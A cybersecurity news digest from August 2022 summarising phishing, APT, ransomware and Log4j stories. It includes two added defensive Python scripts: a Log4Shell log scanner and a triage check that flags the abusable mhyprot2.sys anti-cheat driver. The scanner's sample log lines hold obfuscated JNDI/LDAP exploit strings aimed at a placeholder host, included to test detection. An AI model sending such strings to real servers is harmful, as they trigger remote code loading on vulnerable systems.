Friday, Aug 26, 2022 // (IG): BB //Sponsor: ShadowNews
Phishers who hit Twilio and Cloudflare stole 10k credentials from 136 others
FROM THE MEDIA: Two weeks ago, Twilio and Cloudflare detailed a phishing attack so methodical and well-orchestrated that it tricked employees from both companies into revealing their account credentials. In Twilio's case, the attack defeated its 2FA protection and gave the threat actors access to its internal systems. Now, researchers have unearthed evidence the attacks were part of a massive phishing campaign that netted almost 10,000 account credentials belonging to 130 organizations.
READ THE STORY: arsTechnica
How 'Kimsuky' hackers ensure their malware only reaches valid targets
FROM THE MEDIA: The North Korean 'Kimsuky' threat actors are going to great lengths to ensure that their malicious payloads are only downloaded by valid targets and not onto the systems of security researchers. According to a Kaspersky report published today, the threat group has been employing new techniques to filter out invalid download requests since the start of 2022, when the group launched a new campaign against various targets on the Korean peninsula. The new safeguards implemented by Kimsuky are so effective that Kaspersky reports being unable to acquire the final payloads even after successfully connecting to the threat actor's command and control server.
READ THE STORY: Bleeping Computer
Microsoft Cloud Services Are Vulnerable To Nefarious Cozy Bear MFA Hacking Campaign
FROM THE MEDIA: A new report by cybersecurity firm Mandiant details an ongoing hacking campaign targeting Microsoft 365. The threat actor behind this campaign is an advanced persistent threat (APT) known as “Cozy Bear” or simply “APT29.” APT29 is thought to be a Russian hacking group sponsored by the Russian Foreign Intelligence Service (SVR). Mandiant has linked this group to the staggering SolarWinds hack of 2020, as well as many other cyberattacks on US and NATO strategic interests. APT29 has also carried out multiple attacks on these same targets at the behest of the Russian government. READ THE STORY: Hothardware
Cybercriminals Are Selling Access to Chinese Surveillance Cameras
FROM THE MEDIA: New research indicates that over 80,000 Hikvision surveillance cameras in the world today are vulnerable to an 11-month-old command injection flaw. Hikvision – short for Hangzhou Hikvision Digital Technology – is a Chinese state-owned manufacturer of video surveillance equipment. Their customers span over 100 countries (including the United States, despite the FCC labeling Hikvision "an unacceptable risk to U.S. national security" in 2019). READ THE STORY: Threatpost
Microsoft: Iranian cyberespionage group likely exploiting Log4j vulnerabilities
FROM THE MEDIA: A hacking group linked to the Iranian government has been exploiting Log4j 2 vulnerabilities in SysAid, a set of popular IT support and management software applications, according to Microsoft. The company’s threat intelligence center and other components asserted with “moderate confidence” this week that the group, which they call MERCURY (also known as MuddyWater), has been exploiting Log4j vulnerabilities in SysAid servers that are running the vulnerable code. READ THE STORY: SCMAG
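Exploitation of the Log4j lookup bug as described above leaves a recognisable trace in web server logs: a `${jndi:...}` lookup string, usually in the User-Agent or a query parameter, and often wrapped in `${lower:...}` or `${...:-x}` lookups to dodge naive string matching. The following is an added example (not code from the story, SysAid or Microsoft) that unwraps those nested lookups the way Log4j's own lookup evaluation would, then reports any JNDI lookup that remains. The access-log lines are constructed for the example; the IP addresses are documentation ranges, not real infrastructure.

```python
"""Detect Log4Shell-style JNDI lookups in web access logs, including nested-lookup obfuscation.

Added example; the log lines below are constructed, not real telemetry.
"""
import re
import urllib.parse

# Innermost ${...} lookup: a body with no nested braces or dollar signs.
INNER = re.compile(r"\$\{([^${}]*)\}")
# What is left after normalisation if the request carried a JNDI lookup.
JNDI_RE = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def _resolve(body):
    """Collapse one innermost lookup to the string Log4j would substitute for it.

    Only the lookups attackers use for obfuscation are modelled:
      ${anything:-default}  -> default   (failed lookup falls back to the default)
      ${lower:x} / ${upper:x} -> x lower/upper-cased
    Any other lookup (including ${jndi:...}) is returned unchanged.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    return "${" + body + "}"


def normalize(text):
    """URL-decode, then resolve nested lookups until nothing changes."""
    text = urllib.parse.unquote(text)
    prev = None
    while prev != text:
        prev = text
        text = INNER.sub(lambda m: _resolve(m.group(1)), text)
    return text


def detect(line):
    """Return the de-obfuscated JNDI lookup found in a log line, or None."""
    match = JNDI_RE.search(normalize(line))
    return match.group(0) if match else None


def scan_log(lines):
    """Return [(line_number, payload)] for every line carrying a JNDI lookup."""
    return [(i, p) for i, line in enumerate(lines, 1) if (p := detect(line))]


# Constructed sample access log (Common Log Format with referer and user-agent).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Aug/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [26/Aug/2022:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [26/Aug/2022:10:00:03 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.9%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [26/Aug/2022:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${lower:ldap}://198.51.100.9/y}"',
    '203.0.113.4 - - [26/Aug/2022:10:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${date:yyyy} benign lookup, not JNDI"',
]

if __name__ == "__main__":
    for lineno, payload in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {payload}")
```

The last sample line shows why the de-obfuscation step matters in both directions: a plain `${...}` lookup that is not JNDI is left alone, while the heavily nested payload on line 4 normalises to the same `${jndi:ldap://...}` string as the unobfuscated one. Match on the normalised form rather than on the raw bytes, and treat a hit as an attempt, not proof of compromise; the next step is checking whether the host reached the LDAP server named in the payload.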
Hackers abuse Genshin Impact anti-cheat system to disable antivirus
FROM THE MEDIA: Hackers are abusing an anti-cheat system driver for the immensely popular Genshin Impact game to disable antivirus software while conducting ransomware attacks. The driver/module, "mhyprot2.sys," doesn't need the target system to have the game installed, and it can operate independently or even embedded in malware, offering the threat actors a powerful vulnerability that can disable security software. The vulnerable driver has been known since 2020 and gives access to any process/kernel memory and the ability to terminate processes using the highest privileges. READ THE STORY: Bleeping Computer // The Tech outlook
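Because the driver is legitimately signed, signature checks alone will not catch this "bring your own vulnerable driver" pattern; what stands out is the driver's name and where it is loaded from. The following is an added example (not code from the story or from the vendor) of a triage pass over driver-load telemetry. The records are constructed to resemble Sysmon Event ID 6 ("Driver Loaded") flattened into key=value pairs; real Sysmon events are XML, and the exact field names depend on your configuration. Only the driver name from the story is on the watchlist; the expected-directory list is an assumption a deployment would tune.

```python
"""Triage driver-load events for known-abusable signed drivers (BYOVD).

Added example; the events below are constructed, not real telemetry.
"""
import ntpath
import re

# Legitimately signed drivers that expose primitives an attacker can abuse
# (arbitrary process termination, kernel memory access). Only the Genshin
# Impact anti-cheat driver from the story is listed; extend from your own intel.
ABUSABLE_DRIVERS = {"mhyprot2.sys"}

# Directories driver loads are normally expected from (assumption for this
# example). BYOVD tooling usually drops the driver next to the malware instead.
EXPECTED_DIRS = (r"c:\windows\system32\drivers",)

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Parse 'Key=Value Key2="Value with spaces"' into a dict of unquoted values."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def assess(event):
    """Return the reasons a driver-load event deserves a look (empty list = benign)."""
    reasons = []
    image = event.get("ImageLoaded", "")
    name = ntpath.basename(image).lower()
    directory = ntpath.dirname(image).lower()
    if name in ABUSABLE_DRIVERS:
        reasons.append(f"known-abusable driver {name}")
    if not directory.startswith(EXPECTED_DIRS):
        reasons.append(f"loaded from unexpected directory {directory or '<none>'}")
    if event.get("Signed", "").lower() != "true":
        reasons.append("unsigned driver")
    return reasons


def triage(lines):
    """Return [(RecordId, reasons)] for every Event ID 6 record that raised a reason."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if event.get("EventID") != "6":  # only driver-load events
            continue
        reasons = assess(event)
        if reasons:
            hits.append((event.get("RecordId"), reasons))
    return hits


# Constructed sample events (Sysmon-like, flattened); not real logs.
SAMPLE_EVENTS = [
    'EventID=6 RecordId=101 ImageLoaded="C:\\Windows\\System32\\drivers\\tcpip.sys" Signed=true',
    'EventID=6 RecordId=102 ImageLoaded="C:\\Users\\Public\\mhyprot2.sys" Signed=true',
    'EventID=1 RecordId=103 Image="C:\\Users\\Public\\setup.exe" CommandLine="setup.exe /silent"',
    'EventID=6 RecordId=104 ImageLoaded="C:\\Windows\\Temp\\evil.sys" Signed=false',
]

if __name__ == "__main__":
    for record_id, reasons in triage(SAMPLE_EVENTS):
        print(record_id, "; ".join(reasons))
```

Record 102 is the case the story describes: a validly signed driver, so `Signed=true`, flagged purely on its name and its load path. In production, key the watchlist on file hashes as well as names (a renamed copy still has the same hash), and pair the alert with the process that issued the service-creation call, since loading a driver requires administrative rights the attacker already had.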
Lessons on influence operations from a hybrid war
FROM THE MEDIA: "Lesson for wartime strategic communications: Influence operations are a day-in, day-out job." (Offered by Jennifer Counter, nonresident senior fellow at the Scowcroft Center's Forward Defense practice.) Russia has not succeeded in influence operations, but Ukraine has. "The beauty of what the Ukrainians have accomplished is that a vast network of people who follow the government's messaging lead and further spread the campaign in ways that their individual networks can understand—thus building new advocates and reinforcing Ukraine's base of support." READ THE STORY: The Cyberwire
Kaspersky warns of more Trojan, ransomware attacks on smartphones
FROM THE MEDIA: Kaspersky on Thursday warned of more cybersecurity attacks against Android and iOS devices, with the notorious Anubis Trojan now targeting smartphones using its banking Trojan with ransomware functionalities. The global cybersecurity company detected 11.5 million malicious installation packages in the Asia-Pacific (APAC) region in the first half, more than three times the level for the entire 2021, Suguru Ishimaru, Kaspersky's senior malware researcher in the region, told a conference here. READ THE STORY: Business World
State Department: China using artificial intelligence programs to blunt criticism of Uyghur policies
FROM THE MEDIA: China is engaged in a global influence and disinformation campaign, including the use of artificial intelligence-generated fake images, aimed at countering reports of repression against minority Uyghurs, according to a State Department report made public Wednesday. The report by the Global Engagement Center, the counter-disinformation unit, concludes that China is actively manipulating international discussion of “ongoing genocide and crimes against humanity conducted against predominantly Muslim Uyghurs and members of other ethnic and religious minority groups in the Xinjiang Uyghur Autonomous Region,” in a coordinated effort to amplify Chinese narratives that no genocide is taking place and to harass Beijing’s critics. READ THE STORY: Washington Times
Millions of Plex users may be at risk in password breach
FROM THE MEDIA: Users of home media streaming service Plex have been warned to reset their passwords immediately following a breach in which an undisclosed third party was able to make off with a user dataset that included email addresses, usernames and passwords. Service users were contacted by Plex on Wednesday 24 August after the firm discovered suspicious activity on one of its databases on 23 August. It said it believed the actual impact to have been limited, and that all accessed passwords were “hashed and secured in accordance with best practice”. READ THE STORY: Computer Weekly
Microsoft 365 business users targeted with new DocuSign phishing scam
FROM THE MEDIA: A new business email compromise (BEC) campaign has been targeting Microsoft 365 organizations in a bid to hack corporate executives’ accounts and maliciously divert business payments. Researchers from cyber security firm Mitiga found that the hackers are leveraging inherent weaknesses in 365’s multi-factor authentication (MFA), Microsoft Authenticator, as well as Microsoft 365 Identity Protection. The attacks combine spear-phishing tactics with man-in-the-middle methods to compromise email accounts. READ THE STORY: ITpro
NATO investigates hacker sale of missile firm data
FROM THE MEDIA: The data includes blueprints of weapons being used by Nato allies in the Ukraine conflict. Criminal hackers are selling the dossiers after stealing data linked to a major European weapons maker. MBDA Missile Systems admitted its data was among the stash but claimed none of the classified files belong to the firm. The pan-European company, which is headquartered in France, said its information was hacked from a compromised external hard drive, adding that it was cooperating with authorities in Italy, where the data breach took place. READ THE STORY: BBC
Twilio Hackers Targeted Over 130 Orgs in a Phishing Attack
FROM THE MEDIA: Threat actors behind the recent wave of attacks on several tech companies like MailChimp, Twilio, Klaviyo, etc., had attacked more than a hundred organizations in their campaign – says the Group-IB team. Tracking down the threat actor to someone in the USA, researchers have pointed at all the domains the hacker has used in his campaign and how they managed to breach them all. Overall, they noted about 9,931 login credentials being compromised and used for hijacking the companies. READ THE STORY: TechDator
Twitter Whistleblower Peiter Zatko Has Warned of Cyber Disasters for Decades
FROM THE MEDIA: Co-founder Jack Dorsey picked a famed ex-hacker, Peiter Zatko, to solve some of his social-media company’s most pernicious problems: protecting user privacy and the security of its computer systems. His choice was a man with near-legendary status in the industry who had been finding flaws and ways to correct them for nearly 30 years. Mr. Zatko, known as “Mudge,” is now alleging widespread dysfunction and flaws in the department he oversaw and was hired to fix. READ THE STORY: WSJ
Karakurt ransomware group targeting healthcare providers, HHS warns
FROM THE MEDIA: Provider organizations are being warned to be on the alert for cyberattacks levied by the Karakurt ransomware group after at least four cyberattacks by the threat actors against the healthcare sector in the last three months. Those observed attacks included an assisted living facility, a dental firm, a provider and a hospital. An alert from the Department of Health and Human Services Cybersecurity Coordination Center (HC3) notes that while Karakurt emerged in late 2021, their impact is heightened by their likely ties to the Conti ransomware group, either as a working relationship or as a side business of Conti. READ THE STORY: SCMAG
Meta, Twitter bust ‘deceptive’ pro-US influence campaign: report
FROM THE MEDIA: Facebook, Instagram and Twitter disrupted pro-United States covert influence operations that used “deceptive tactics” to shape opinion in Central Asia and the Middle East, according to a report by internet researchers. Dozens of fake accounts promoted pro-Western narratives while trying to discredit countries including China, Russia and Iran over a nearly five-year period, according to the report released on Wednesday by Graphika Inc and the Stanford Internet Observatory (SIO). READ THE STORY: Aljazeera
Fans heading to the World Cup in Qatar and firms involved in tournament warned about cybercrime risk
FROM THE MEDIA: Henry Wilkinson, chief intelligence officer at security intelligence firm Dragonfly, warns there will be a large increase in cybercrime targeting people and firms because of the number of people wanting to attend and travel there. He says there is already evidence of a rise in the number of efforts to scam people planning to head to the tournament, which begins in Qatar on 20 November. READ THE STORY: Sky News
FBI Springfield Office hosts cyber crime roundtable
FROM THE MEDIA: In 2021, the FBI Internet Crime Complaint Center took in 900,000 complaints with 7 billion dollars' worth of losses. The state of Illinois had the fifth highest number of victims and the seventh highest monetary loss. FBI and technology safety officials met in Springfield today to discuss cyber security concerns. David Johnson is the head of the Peoria InfraGard Satellite Chapter, a private sector partner with the FBI. He said there are two main types of threats. One is cybercrime, where people are attempting to steal money, and the other is nation-state threats, where outside groups are attempting to infiltrate infrastructure. READ THE STORY: WANDTV
DHS shuts down disinformation board months after its efforts were paused
FROM THE MEDIA: The Department of Homeland Security has officially disbanded its controversial disinformation board, months after it was put on pause amid intense Republican-led backlash. In May, the department's "Disinformation Governance Board" initiative was halted after weeks of attacks, including those aimed at the disinformation expert appointed to lead the effort. The board was intended to coordinate department activities related to disinformation aimed at the US population and infrastructure. On Wednesday, it was formally terminated. READ THE STORY: FOX40
Google to roll out anti-disinformation campaign in some EU countries
FROM THE MEDIA: Google’s Jigsaw subsidiary will launch a campaign next week to tackle disinformation in Poland, Slovakia and the Czech Republic about Ukrainian refugees based on research by psychologists at two British universities. Working with Jigsaw, the psychologists from the universities of Cambridge and Bristol have produced 90-second clips designed to "inoculate" people against harmful content on social media. The clips, which will run in advertising slots on Google’s YouTube and also on other platforms such as Twitter (TWTR.N), TikTok and Meta’s (META.O) Facebook, aim to help people identify emotional manipulation and scapegoating in a news headline.
READ THE STORY: Dunya
DJI Unveils DJI Avata, The Ultimate Immersive Drone Experience
FROM THE MEDIA: DJI, the world’s leader in civilian drones and creative camera technology, today introduces DJI Avata, a transformational new drone that offers an unparalleled experience of immersive flight. DJI Avata creates a new paradigm for first-person view (FPV) drone flight, allowing every pilot to race through the skies and feel its astonishing performance, agility, and easy control. Coupled with the new DJI Goggles 2 and the intuitive DJI Motion Controller, DJI Avata delivers a flight experience that was unimaginable until now. READ THE STORY: UASWEEKLY
With Iranian drones, Russia complicates nuclear deal talks
FROM THE MEDIA: Russia has obtained hundreds of Iranian drones capable of being used in its war against Ukraine despite U.S. warnings to Tehran not to ship them, according to Western intelligence officials. It’s unclear whether Russia has begun flying the drones against Ukrainian targets, but the drones appear to be operational and ready to use, said the officials, who spoke on condition of anonymity to discuss sensitive intelligence. The reported shipment marks the latest sign of what appears to be closer military cooperation between the longtime allies.
READ THE STORY: The Washington Post
Cybercrime Groups Increasingly Adopting Sliver Command-and-Control Framework
FROM THE MEDIA: Nation-state threat actors are increasingly adopting and integrating the Sliver command-and-control (C2) framework in their intrusion campaigns as a replacement for Cobalt Strike. "Given Cobalt Strike's popularity as an attack tool, defenses against it have also improved over time," Microsoft security experts said. "Sliver thus presents an attractive alternative for actors looking for a lesser-known toolset with a low barrier for entry." Sliver, first made public in late 2019 by cybersecurity company BishopFox, is a Go-based open source C2 platform that supports user-developed extensions, custom implant generation, and other commandeering options. READ THE STORY: THN
Preventing attacks on mobile applications in the enterprise
FROM THE MEDIA: The use of mobile devices within enterprise organizations is commonplace, so organizations must prepare for all sorts of mobile threat vectors -- including attacks via mobile applications -- to avoid a cybersecurity breach. As the COVID-19 pandemic and the trend of working from anywhere have pushed many people to work remotely, mobile devices have become a primary channel for employees to stay in touch with their employers and enterprise networks. READ THE STORY: TechTarget
Cyberattack Raises Pressure on European Water Providers During Drought
FROM THE MEDIA: A cyberattack on a British company that supplies drinking water to 1.6 million customers has raised security concerns about the vulnerability of such utilities across drought-stricken Europe. South Staffordshire PLC said last week that its information-technology systems were hit by a cyberattack but it didn’t affect the company’s ability to provide safe drinking water to customers. A ransomware group known as Cl0p took responsibility for the attack and published online some data it said it stole from the company. The company didn’t respond to requests for comment. READ THE STORY: WSJ
India - Anti-Drone Doctrine And Countering Drones
FROM THE MEDIA: Drones have emerged as effective tools of modern warfare, whether in insurgency environments or actual war. On July 31, a US drone fired two Hellfire missiles from a distance of 1,850 km to kill al-Qaeda chief Ayman al-Zawahiri in Kabul. Earlier, in a similar targeted attack on 3 January 2020, Qasem Soleimani, an Iranian major general, was killed by a U.S. drone strike at Baghdad International Airport. It means drones can pick pin-point targets and neutralise them. Note that the drones fired their missiles from "stand-off" distances. Some years back, Yemen's Houthi rebels used drones to attack two Saudi oil fields. READ THE STORY: Mission Victory India
Items of interest
Ukraine’s volunteer ‘IT army’ responds to Russian hackers, minister says
FROM THE MEDIA: The largest power producer in Ukraine, which operates four nuclear power plants, last week survived what officials described as the most powerful attack on Ukraine by Russian hackers since the end of February. According to the Ukrainian nuclear agency, Energoatom, the attack did not cause any harm.
At the same time, Ukrainians are hitting back at Russian digital infrastructure. In Russia, more than 600 online resources including the federal postal service, pension fund, online banking and video conference platforms were affected by Ukrainian hackers this month, according to a statement by the Ministry of Digital Transformation of Ukraine.
“Cyberspace is a frontline of the 21st century, and victories there are as important as in actual battlefields,” Mykhailo Fedorov, the minister of Digital Transformation of Ukraine, told ABC News.
He’s responsible for establishing the so-called “IT army” — a gathering of more than 230,000 anonymous volunteers who are working together via Telegram, an online messaging platform.
Russia’s assault on Ukraine has extended into the virtual domain as well as on real-life battlegrounds. And here the enemy is choosing very sensitive targets that could impact security for Ukraine, Europe and even the world.
But Fedorov said his country’s cyber security system was more than efficient.
“None out of over 800 cyberattacks since February 24 caused real losses for the Ukrainian economy, stopped the banking system or damaged critical infrastructure,” he said.
READ THE STORY: DeltaPlex News
Developing Ethical Hacking Tools with Python (Video)
FROM THE MEDIA: Developing Ethical Hacking Tools with Python (Lesson 1 of 5) | Introduction | Cybrary.
Ethical Hacking using Python | Password Cracker Using Python (Video)
FROM THE MEDIA: Ethical Hacking using Python | Password Cracker Using Python.
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com